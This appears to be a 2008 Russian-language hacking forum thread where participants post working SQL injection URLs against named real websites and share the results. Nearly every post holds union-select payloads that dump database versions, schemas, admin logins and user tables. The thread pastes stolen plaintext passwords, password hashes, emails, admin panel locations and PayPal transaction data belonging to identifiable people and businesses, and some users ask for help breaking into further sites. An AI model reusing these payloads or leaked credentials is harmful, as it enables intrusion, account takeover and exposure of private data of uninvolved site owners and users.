http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/*
Поля подобрал, а что дальше делать - хз :)

ice1k

11.01.2008, 08:52

http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/*
Поля подобрал, а что дальше делать - хз :)
^^

http://www.naushko.ru/whisper.php?id=36231+and+1=-1+union+select+1,2,3,concat(email,0x3a,pass),5,6+f rom+users+limit+0,1/*

Пароли там кстати в открытом виде, и аккаунтов за 20к...

Nea7

11.01.2008, 11:37

^^
http://www.naushko.ru/whisper.php?id=36231+and+1=-1+union+select+1,2,3,concat(email,0x3a,pass),5,6+f rom+users+limit+0,1/*
Пароли там кстати в открытом виде, и аккаунтов за 20к...
http://forum.antichat.ru/showpost.php?p=552492&postcount=4446
да и тему от баянов чистить иногда надо...

http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat_ws(0x3a,user_login,passw ord,email,user_id),4,5,6,7,8,9+from+members+limit+ 0,1/*
http://www.jomacs.org/article.php?article_id=-1+union+select+1,2,concat(username,0x3a,user_passw ord,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9+fro m+phpbb_users+limit+1,1/*

Nea7

11.01.2008, 13:43

http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=@@version
'Microsoft SQL Server 2000
http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=(select+top+1+cast(log in_name+as+nvarchar)%2B%27%3A%27%2Bcast(password+a s+nvarchar)%2B%27%3A%27%2Bcast(email_address+as+nv archar)%20from%20admin_logins)

'rhys:rhys:rhys@webenz.co.nz'
'harrison:harrison:harrison@webenz.co.nz'
'greg:greg:greg.mcnamara@webenz.co.nz'
'brian:barclay333:changeme@sometime.com'
'zb2:wellington:gordonm@radionetwork.co.nz'
'jacqui:jacqui:jacqui.jones@webenz.co.nz'
'philv:zmwel1:philv@radionetwork.co.nz'
'zbremote:grx336:brianb@radionetwork.co.nz'
'helen:superwoman:helenmccarthy@radionetwork.co.nz '
'terabyte:janem:jane@terabyte.co.nz'
'andrew:topping:andrewtopping@radionetwork.co.nz'
'briannews:barclay333:brianb@radionetwork.co.nz'
'andrewt:piccys:andrewturley@radionetwork.co.nz'
'brian2:barclay333:brianb@radionetwork.co.nz'
'affiliates:affiliates:allanlee@radionetwork.co.nz '
'zmonline:zmonline:zm@zmonline.com'
'weatherman:phil:philipduncan@radionetwork.co.nz'
'amante:anything:amante@radionetwork.co.nz'
'zmprogs:tractor:zm@zmonline.com'
'zbhamilton:mooloo:heemih@radionetwork.co.nz'
'davec:zmwel2:davec@radionetwork.co.nz'
http://www.kathyspies.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2000

http://tlcwalford.com/anndetails.asp?NewsID=1+or+1=@@version
'Microsoft SQL Server 2005

http://www.titans-consulting.com/anndetails.asp?id=1+or+1=@@version
'Microsoft SQL Server 2005

it's my

11.01.2008, 14:49

www.respectfamily.com - Respect Records Digital (Drum & Bass)
http://www.respectfamily.com/index.php?mod=members&op=viewmember&id=-41+union+select+0,1,2,3,4+from+members/*

ElteRUS

11.01.2008, 15:39

theplace.ru

http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5/*

5.0.22/theplace/theplace@localhost

http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+links/*

логин/пароль
baddy13/superior

http://www.theplace.ru/news/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+models/*

логин/пароль
rukzak/rukzak

-------------------------------------------------------------------------

http://stroiru.com/doc_detail.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user())/*

4.0.27/goravtomat_db2/goravtomat_db2@88.214.192.30
-------------------------------------------------------------------------

r-id.ru

http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1/*

5.0.32-Debian_7etch1-log/rid/rid@localhost

http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,email,pass),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+from+u sers+limit+0,1/*.

мейл/хеш
sinyagin@neolant.ru/35560b3d7e41a43aa12c6d01dc9a5131

Админка: http://www.r-id.ru/admin

Логин/пасс для админки:

http://www.r-id.ru/main/press/news?nid=-1+union+select+1,concat_ws(0x2F,toString,pass),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1+fro m+admins/*

RIDadmin/NoStranger

zarkon

11.01.2008, 15:55

вот такой приколяк....

http://www.mg-portal.com.ua/index.php?st=0&lang=0&id=4+AND+1=0+union+select+0,0,0,concat(char(80),ch ar(114),char(101),char(118),char(101),char(100)),c oncat(char(89),%20char(97),char(32),char(103),char (108),char(117),char(107))

а команду выполнит не получилось..

А®ТеS

11.01.2008, 18:23

http://www.bluebit.com.au/

http://www.bluebit.com.au/cms.php?id=-1+UNION+SELECT+1,concat_ws(0x3A,id,mc_gross,paymen t_gross,shipping,tax,mc_fee,payment_fee,mc_currenc y,txn_type,payment_date,payment_status,verify_sign ,txn_id,payment_type,receiver_id,item_name,item_nu mber,receipt_id,custID,rawData),3+FROM+bluebitbiz_ bluebit_com_au.ecom_paypal/*

Выводит полную историю PayPal операций конторы. Там они как то софт за 30$ штука продают :).
http://www.atcnt.com.au/
http://www.atcnt.com.au/page.php?id=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10/*

ThreeD

11.01.2008, 18:24

www.rayner.com

http://www.rayner.com/products.php?id=-22+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables/*

Все таблицы.

http://www.rayner.com/products.php?id=-22+union+select+1,2,3,column_name,5,6,7,8,9+from+i nformation_schema.columns/*

Все поля.

presidentua

11.01.2008, 18:35

love.svadba.net.ru
http://love.svadba.net.ru/ankett.php?id=-10'+union+select+1,2,3,4,pass,id,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+fro m+users/*
в таблице users, такие поля pass,id, email, остальных не подбирал

и есть раскрытие путей:
Notice: Undefined variable: fname in /usr/local/psa/home/vhosts/svadba.net.ru/sub/love/ankett.php on line 7

сильно не рылся,но у них там форум есть большой.
Может кто жену ищет ему это поможет :)

.Begemot.

11.01.2008, 18:40

vip-tur.ru
http://www.vip-tur.ru/?page=country&id=22+union+select+0,concat(user(),0x3a,version(), 0x3a,database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
USER:DIMAFLEX_VIPTUR@LOCALHOST
VERSION:5.0.40
DATABASE:DIMAFLEX_VIPTUR
http://www.vip-tur.ru/?page=country&id=22+union+select+0,table_name,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39+from+informa tion_schema.tables/* - имена всех таблиц
http://www.vip-tur.ru/?page=country&id=22+union+select+0,column_name,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39+from+inform ation_schema.columns/* - имена всех колонок

WuWu

11.01.2008, 21:04

http://www.imc.pl.ua/katalog_ssilok.php?show_links=6+union+select+1,2,3 ,4,5,6,7,concat_ws(0x10a,version(),database(),user ())/*
4.1.22-log
imc_imc
imc_imcb@localhost

я туговат в этом деле, но данные достал...

Только не кричите... что возвожно сделать с помощью этой инфы?

ElteRUS

11.01.2008, 21:27

WuWu, ну к information_schema там доступа нет, значит структуру их базы мы не узнаем. Да и чего там интересного вобще узнавать ? Форума у них нету. Авторизации для юзеров я тоже не нашел.. Не перспективно, имхо ))

---------------------------------------------------------------------------

http://www.jetcharter.ru/new/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6/*

4.0.26/jetcharterru/jetcharterru@62.213.73.13

WuWu

11.01.2008, 22:15

нашол дырку в статистике сайта... вот, но немогу добраться до структуры!!

http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*

.Begemot.

11.01.2008, 22:35

нашол дырку в статистике сайта... вот, но немогу добраться до структуры!!

http://www.top.iv-fr.net/stat.php?id=1+UNION+SELECT+1,2,3,4,/*
Используй конструкцию order+by+1/* (подробнее читай в разделе статьи) Там 25 столбцов.
http://www.top.iv-fr.net/stat.php?id=-1+union+select+0,1,2,3,concat(Version(),0x3a,USER( ),0x3a,DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/*
4.1.22-standard:ivfr_top1@localhost:ivfr_top

ElteRUS

11.01.2008, 22:47

Используй конструкцию order+by+1/* (подробнее читай в разделе статьи) Там 25 столбцов.
4.1.22-standard:ivfr_top1@localhost:ivfr_top

И нету доступа к information_schema ) После нескольких попыток перебора получаем

http://www.top.iv-fr.net/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x2F,mail,passwor d),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25+from+top_users/*

мейл/пароль
top@iv-fr.net/1
npetia@inbox.ru/8kl9mt
pp.majesty@online.ua/dwpa8g
и тд.

ЗЫ если хочешь поставить кому-нибудь плюс - жми на кнопку репутация в правом верхнем углу поста, а не на те +- под аватаркой ))

WuWu

11.01.2008, 22:59

Там 25 столбцов.

я до токо до 20 дошол был(от я лентяй Ы..)
мейл/пароль
top@iv-fr.net/1
npetia@inbox.ru/8kl9mt
pp.majesty@online.ua/dwpa8g
и тд.
сорри... может я тупой, я ввёл твой запрос... и неувидел того что увидел ты...

vp$

11.01.2008, 23:43

http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,email,12+from+subscribers/*
больше ничего интересного в базе нет
http://zvisti.com.ua/info.php?id=45084444+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,count(email),12+from+subscribers/*
всего 78 строчек

Tyc00n

12.01.2008, 00:50

http://www.lazy-games.com/localiz/info.php?id=-999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.northberwickuk.com/info.php?id=-268+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,1,2,3,1,4,5,7,6,1,1,1,1/*
http://www.alphaonenow.org/info.php?id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22/*
http://www.cacgrants.org/cuyahoga.arts.and.culture.news.room.php?id=-999'+union+select+1,concat(version(),0x3a,user()), 3,4,5,6,7,8,9,0/*
http://www.br.clicksconnect.com/index.php/riodejaneiro/hotels?id=-9968+union+select+1,2,3,4,load_file(0x2f6574632f70 6173737764),1,2,3,5,9/*&page=address
http://www.aha.am/index.php?lang=eng&s=hotels&id=-999+union+select+1,2,3,4,5/*
http://www.season.com.ua/show_photos.php?table=hotels&id=-999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47/*

@_@

WuWu

12.01.2008, 00:54

http://www.aquarius.pl.ua/index.php?pg=vacancies&id=1+UNION+SELECT+1,2,concat(Version(),0x3a,USER(% 20%20),0x3a,DATABASE()),4,5,6,7,8/*
аж самого улыбнуло :)

~EviL~

12.01.2008, 01:00

http://educasources.education.fr/

http://educasources.education.fr/selecthema.asp?id=1)+or+1=@@version--
« Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86) Apr 14 2006 01:12:25 Copyright (c) 1988-2005
Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) »

http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+db_name())--
« MDC »

http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+system_user)--
« web »

Все таблицы (в французском не смыслю, не стал проверять содержимое таблиц):

http://educasources.education.fr/selecthema.asp?id=1)+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('canal_sceren_ressources','T_LIEN_NIVEAU',' Broch_Rubriques','T_REFERENCE','Broch_SousRubrique s','tempcedric','Yann_Temp','tempcedric2','CodePri x','tempcedric3','Personnes_panier_admdoc','VIEW1' ,'Cyb_Departement','VIEW2','Cyb_inscrits','vue_app _arch_form1','Date_observatoire','Broch_Prix','vue _app_arch_liste1b','Yann_Temp2','Descriptions_Docu mentaires','EducaFluxRSS','vue_app_barre','Partena ires','PGI_Champs','Descriptions_Editoriales','Edu caRSSPerso','vue_articlerevue','Producteurs_Ressou rces','old_PGI_Disciplines','Dewey','vue_auteurs', 'Ressources_Co_Editeurs','PGI_Disponibilite','Dewe y_Ressources','2007_cor_2006_2007','vue_bases_revu es','old_PGI_Niveaux','Discipline_Option_RJC','mot bis_MicroT','vue_bases_videos','Ressources_Partena ires','old_PGI_Supports')--

Tigger

12.01.2008, 01:24

http://astrol.ru/index.php?page=-125+union+select+1,2,3,4,5,6,7/*
Не смог ничего вывести
-----------------------------------------------------------------------
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,concat_ws(0x2f,version (),user(),database()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*
5.0.45-log/u32888@10.10.223.204/u32888
Все таблицы:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+in formation_schema.tables/*
Все колонки:
http://www.fondsk.ru/article.php?id=-1143+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+i nformation_schema.columns/*
-----------------------------------------------------------------------
http://lit.phil.pu.ru/article.php?id=7+union+select+1,2,3,4,5/*
Пробывал вывести version() user() database() через конверты...не получилось...
-----------------------------------------------------------------------
http://encycl.anthropology.ru/article.php?id=472+union+select+1,concat_ws(0x2f,v ersion(),user(),database()),3,4,5,6,7,8,9,10/*
5.0.45-community-log/anthropo_visitor@localhost/anthropo_encycl
Есть таблица user
Все таблицы:
http://encycl.anthropology.ru/article.php?id=472+union+select+1,table_name,3,4,5 ,6,7,8,9,10+from+information_schema.tables/*
Все колонки:
http://encycl.anthropology.ru/article.php?id=472+union+select+1,column_name,3,4, 5,6,7,8,9,10+from+information_schema.columns/*
-----------------------------------------------------------------------
http://rybalka.zooclub.ru/article.php?id=-105+union+select+concat_ws(0x2f,version(),user(),d atabase()),2,3/*
5.0.45-community-log/zooclub_zooclub@localhost/zooclub_rybalka
Все таблицы:
http://rybalka.zooclub.ru/article.php?id=-105+union+select+table_name,2,3+from+information_s chema.tables/*
Все колонки:
http://rybalka.zooclub.ru/article.php?id=-105+union+select+column_name,2,3+from+information_ schema.columns/*
-----------------------------------------------------------------------
http://www.order.elite-games.ru/article.php?id=-175+union+select+1,2,3,4,concat_ws(0x2f,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20/*
4.1.21-community-nt/order@localhost/order

WuWu

12.01.2008, 13:03

http://www.orda-clan.ru/comments.php?n=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25/*

помогите не догоняю структуру, дошол до ,50,51/*

ElteRUS

12.01.2008, 13:22

http://orda-clan.ru/comments.php?n=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x2F ,cast(version()+as+binary),cast(database()+as+bina ry),cast(user()+as+binary)),12/*

4.1.11-Debian_4sarge7-log/mihanikus_site/mihanikus_site@85.249.135.3

Доступа к information_schema нет. Еще есть таблицы mihanikus.user, mihanikus.users, orda.user, orda.users - но к ним тоже нету доступа ) Подбирай, возможно найдешь другие интересные таблицы

WuWu

12.01.2008, 13:24

http://www.vkus.by/index.php?n=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x 3a,DATABASE()),4,5,6/*

симпатично вышло =)

WuWu

12.01.2008, 13:47

http://www.pilot-film.com/index.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10,1 1/*
блин опять затупил....

vp$

12.01.2008, 14:29

а подумать?
http://www.pilot-film.com/index.php?id=222222222+union+select+1,AES_DECRYPT( AES_ENCRYPT(user(),0x71),0x71),3,4,5,6,7,8,9,10,11/*

Tigger

12.01.2008, 15:00

http://www.haifa.ru/article.php?id=-743+union+select+1,concat_ws(0x2f,version(),user() ,database()),3,4,5,6,7,8,9/*&Lang=Ru
5.0.45/haifaru@81.177.16.101/haifaru_artcls
-----------------------------------------------------------------------
http://www.muscul.ru/article.php?id=-5+union+select+1,2,concat_ws(0x2f,version(),user() ,database()),4,5,6,7,8,9/*
4.1.22-log/musculr4_first@localhost/musculr4_main
-----------------------------------------------------------------------
http://www.rustrana.ru/article.php?nid=-3435+union+select+concat_ws(0x2f,version(),user(), database()),2,3/*
Вывод в тайтле))
-----------------------------------------------------------------------
http://www.chayka.com/article.php?id=-53+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10,11/*
5.0.45/seagullmag@localhost/seagullmag
Все таблицы:
http://www.chayka.com/article.php?id=-53+union+select+1,table_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.tables/*
Все колонки:
http://www.chayka.com/article.php?id=-53+union+select+1,column_name,3,4,5,6,7,8,9,10,11+ from+information_schema.columns/*
-----------------------------------------------------------------------
http://www.phpbuddy.com/article.php?id=-8+union+select+concat_ws(0x2f,version(),user(),dat abase()),2,3,4,5,6/*
4.1.21-standard/phpbud22_phpbudd@localhost/phpbud22_phpbuddy
-----------------------------------------------------------------------
http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10/*
4.1.22-standard/pollan_article@localhost/pollan_articles
-----------------------------------------------------------------------
http://www.mcpost.com/article.php?id=-418+union+select+1,2,3,concat_ws(0x2f,version(),us er(),database()),5,6,7,8,9,10,11,12/*
4.0.27-log/mcpost@localhost/mcpost
http://www.mcpost.com/article.php?id=-418+union+select+1,2,concat(username,char(58),pass word),4,5,6,7,8,9,10,11,12+from+users/*
Можно через limit

Welemir

12.01.2008, 15:23

http://www.uprava.org/section.php?id=235+union+select+0,1,2,3,4,5,column _name+from+uprava_org.razdels/*

узнал только,что есть колонка id.Других помоему нет,перебрал все названия,что встретились в форме)).К другим таблицам я доступа не нашёл.

Welemir

12.01.2008, 15:30

Welemir

12.01.2008, 15:37

http://www.ipecac.com/bio.php?id=44+union+select+0,1,2,3/*

Доступа нету ваапще:РР,зато запрос order+by пашет.

WuWu

12.01.2008, 15:44

Welemir

12.01.2008, 15:48

я занова перебрал... больше этого нечего недобился

http://www.uprava.org/section.php?id=-1+union+select+1,2,concat(Version(),0x3a,USER(),0x 3a,DATABASE()),4,5,6,7/*

Тож самое,ток я по другому сделал:Р.Перебирал полчаса и нифига)

.Begemot.

12.01.2008, 17:48

newyorkrecruiter.com
http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+USER(),VERSION(),DATABASE(),4/*
USER:recnet2@localhost
VERSION:4.1.20-log
DATABASE:portlandrecruiter_com_-_site
http://www.newyorkrecruiter.com/job_browse.php?category_alpha=-1+union+select+username,password,3,4+from+users+li mit+1,100/*
Есть поля - username,password
и таблица - users :)

159932

12.01.2008, 18:08

http://omsk.arsec.ru/modules/nnews/index.php?idnews=-35+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login name,pass)+from+xs_users/*&act=detail
5.0.45-log
Admin:3e22c75c164803a3989a7d36c5efbff0
пароль не поддаёться
----------------------------------------------------------------------
http://www.ams-prototype.com/ams/?id=-33+union+select+1,2,3,4,5,concat(username,0x3a,pas sword),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3+from+uten ti+limit+0,1/*
5.0.45-
admin:amsrlpw01
де админка не знаю ((

BizzyD

12.01.2008, 19:50

http://www.gimmeshelter.co.uk/ArtistInfo.php?user_id=99999+union+select+1,2,conc at_ws(0x3a,username,password,email),4,5,6+from+use r+limit+2,1/*
corrugated@dinero.dreamhost.com
corrugated
5.0.24a-standard-log

WuWu

12.01.2008, 20:24

http://www.bedesworld.co.uk/newsevents-news-story.php?newsId=59+union+select+1,concat(Version( ),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11 ,12/*
акуратно вышло =)

~EviL~

12.01.2008, 21:21

http://www.cowparademilano.it/

http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.45-community-log:Sql167630@62.149.140.131:Sql167630_1

http://www.cowparademilano.it/news_dettaglio.php?news_id=-137+UNION+SELECT+1,concat_ws(0x3a,user_id,user_nam e,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6+FROM+cp_user+LIMIT+0,1/*
2:cowparade:milano2007

http://www.stormensupport.no/

http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_w s(0x3a,version(),user(),database()),0x71),0x71),2, 3,4,5,6,7,8,9,10/*
4.1.11-Debian_4sarge7-log:stormensql@tor:stormen

http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_w s(0x3a,username,password),0x71),0x71),2,3,4,5,6,7, 8,9,10+FROM+users/*
aafk:riise

http://www.stormensupport.no/artikkel.php?news_id=-1533+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(concat_w s(0x3a,username,user_password,user_email),0x71),0x 71),2,3,4,5,6,7,8,9,10+FROM+phpbb_users+WHERE+user _id=2/*
NoggyStyles:2e5de30321d8e0151a76c10f5f8df122:nogge n@stormen.no::240982
Tante:61a1e25dd5c27f96825c84e452e268ce:ingerbeateb @hotmail.com::ibb (модер)
...
(http://www.stormensupport.no/forum/login.php)

BizzyD

12.01.2008, 21:35

http://www.photostockplus.com/home.php?user_id=99999+union+select+concat_ws(0x3a ,username,password,email),2,3,4,5,6,7,8,9,10,11,12 +from+users+limit+2,1/*
photostock@74.53.6.244
hithop_photostock
4.1.20-log
root:78945d315964d1e0

http://www.cahiersdufootball.net/article.php?id=99999+union+select+1,2,3,concat_ws( 0x3a,user

,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22+from+mysql.user/*
ROOT:8B802B564368ADF78A06B7E873C3827E235A87CE
CAHIERSDUFOOTBALLNET3
ROOT@LOCALHOST
5.0.21-LOG
MICHEL : platini

.Begemot.

12.01.2008, 21:49

curiocitytravel.com
http://www.curiocitytravel.com/wNewsDetail.php?nId=-6+union+select+1,convert(concat(USER(),0x3a,VERSIO N(),0x3a,DATABASE())+using+latin1),3,4,5/*&lnId=1&cSe=1
USER:uv0642@localhost
VERSION:4.1.14-log
DATABASE:uv0642_curiocity

Fata1ex

12.01.2008, 21:55

PR:3
http://www.togather.biz/showcg.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,user(),version(),database()),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
archi@flik.pw:4.1.15-Debian_1-log:archi

PR:3
http://www.dety.info/tour.php?id=-182+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char( 58),user(),version(),database()),11,12,13,14/*

poisktur@v5.valuehost.ru:4.0.27-max-log:poisktur

vp$

12.01.2008, 22:54

http://www.hairbeauty.ru/art.php?ID=70000000+UNION+SELECT+1,2,concat_ws(0x3 a,Login,Pass),4,5,6+from+AdUs/*
Kanochkina:a510afa5581822667f2e01793c44be2b:270619 60
sergey:c3c7b0e18a5373f727fa282d13143c11:11121934
misha:4b1130a31d98355e4590bbc3d1798bab
artur:825d7a62a2b80323a4ab48502e2a6e32
kio306:e0cb81f8d2408e37f7b679ac1fb95e02
логин:пас хз откуда

на сайт есть форум на 1к юзеров, но доступа к его базе нет

ElteRUS

12.01.2008, 23:02

http://turotdih.ru/news_article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22-standard/maximwi_turotdih/maximwi_all@localhost
-----------------------------------------------------------------------------

http://www.garantpost.ru/about/news/?y=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.0.27-log/garant/garant@zvm8.host.ru
-----------------------------------------------------------------------------

elephant-odessa.com

http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5/*

4.1.22/elephantodessa/u_elephantod@localhost

Админка : http://elephant-odessa.com/admin

Логин/пароль к админке
http://elephant-odessa.com/rus/archive.php?nid=-1'+union+select+1,2,3,concat_ws(0x2F,username,pass word),5+from+users/*

admin/[jkjlbkmybr2005

159932

13.01.2008, 00:28

www.mediafetcher.com
http://www.mediafetcher.com/article_full.php?id=-34853+union+select+1,2,3,4,5,6,concat_ws(0x3a,fld_ username,fld_password,fld_email,fld_zip,fld_phone, fld_country,fld_state,
fld_city,fld_address,
fld_fname,fld_lname),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3+from+tbl_users+limit+0,1/*
5.0.26-Debian_2-log
31К юзеров

Tyc00n

13.01.2008, 00:56

Помогите раскрутить
http://greaterphoenixleadership.org/
Запрос писать в Username и Password =)

159932

13.01.2008, 00:59

http://www.hairbeauty.ru/art.php?ID=70000000+UNION+SELECT+1,2,concat_ws(0x3 a,Login,Pass),4,5,6+from+AdUs/*
также там есть :
http://hairbeauty.ru/info.php - phpinfo
http://hairbeauty.ru/stat/setup/index.php - установка скрипта ))

Listen

13.01.2008, 02:58

Помогите раскрутить.. короче нашел возможность сделать sql inj
http://beatlive.net.ru/index.php?do=searchнажать расширенный поиск - Поиск по имени пользователя ввести qwerty - поставить галку 'точное имя' и нажать начать поиск - появляется это

The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'as score, autor, dle_post.date AS newsdate, dle_post.date AS date, short_story A' at line 1

Error Number:
1064

SELECT id, as score, autor, dle_post.date AS newsdate, dle_post.date AS date, short_story AS story, dle_post.xfields AS xfields, title, descr, keywords, category, alt_name, comm_num AS comm_in_news, allow_comm, rating, news_read, '' AS output_comms FROM dle_post WHERE dle_post.approve = '1' AND dle_post.autor like 'qwerty' ORDER BY score DESC, date desc LIMIT 0,20

я хоть по адресу обратился? ;)

K1nD[e]R

13.01.2008, 05:31

http://grabli.net/plug.php?p=horo&sd=0&ed=0&zid=5+union+select+version(),table_name+from+infor mation_schema.columns+where+column_name=0x70617373 776f7264/*

Version : 5.0.32-Debian_7etch1/root@localhost/grabli

users
gateway_pop_accounts
tech
user
probid_admins
probid_users
phpads_affiliates
bhost_admin
bhost_log
bhost_users
bnt_ships
Admins
Profiles
aff
moderators
admin
ftp
ibf_forums
ipb_forums
jos_users
dwm-pop3
dwm-users
osdate_admin
osdate_affiliates
osdate_user
1_alliances
new
top_new
accounts
dle_users

BizzyD

13.01.2008, 12:36

http://www.lindenbayromance.com/product_details.php?product_id=99999+union+select+ 1,2,user_name,password,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+admin/*

root@localhost:lndenbayromance:4.1.22-standard

root:ladybug

admin:newbeginnings

http://www.iirr.org/bookstore/index.php?product_id=99999+union+select+1,2,3,4,5, 6,7,8,9,10,11/*
iirrbookstore@gloria.siteprotect.com:iirrbookstore :4.0.15-standard

Leone_510

13.01.2008, 20:16

wow.metrolife.ru

http://wow.metrolife.ru/armory/index.php?act=charsearch

в поиске: abc')+union+select+1,2,3,concat(user,0x3b,password ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33+from+mysql.user/*

А®ТеS

13.01.2008, 20:48

http://www.thelearningedge.com.au/

http://www.thelearningedge.com.au/products.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3A,userid,firstname ,lastname,username,userpassword,lastloggedin,type) ,4,5+FROM+productionwww.ADMIN+LIMIT+0,1/*

Австралия, Google PR 5!

159932

13.01.2008, 20:54

http://www.onlinegooner.com/exclusive/index.php?id=-498+union+select+1,2,3,4,user_password,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7+
from+phpbb_users+limit+1,1/*
5 верстка ...
от админки форума phpbb..
http://www.onlinegooner.com/phpbb2/admin
robburne:arsen10
----------------------------------------------------------------------
http://www.gratuitati.ro/testimoniale.php?ID=-10+union+select+1,2,concat(table_name,0x3a3a3a)+fr om+information_schema.tables/*
5 верстка ...
----------------------------------------------------------------------
http://www.ayaconsult.com/npages/?pid=3&sid=-17+union+select+concat_ws(0x3a,user,version(),0x73 6b794c6162),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+m ysql.user/*
5.0.22
addokufuor:skyLab
сбда не подходит ((
http://www.ayaconsult.com/admin/index.php

Nea7

13.01.2008, 21:19

5.0.22
addokufuor:skyLab
сбда не подходит ((
http://www.ayaconsult.com/admin/index.php
-17+union+select+concat_ws(0x3a,username,password,e mail),2,3,4,5,6,7,8,9,0,11,2,3,14,5,6,7+from+admin users/*
raskorli:ayaconsult12:jonah.akorli@ayaconsult.com
amoako:ayaconsult12:richmond.amoako@ayaconsult.com

A2GIL

13.01.2008, 21:31

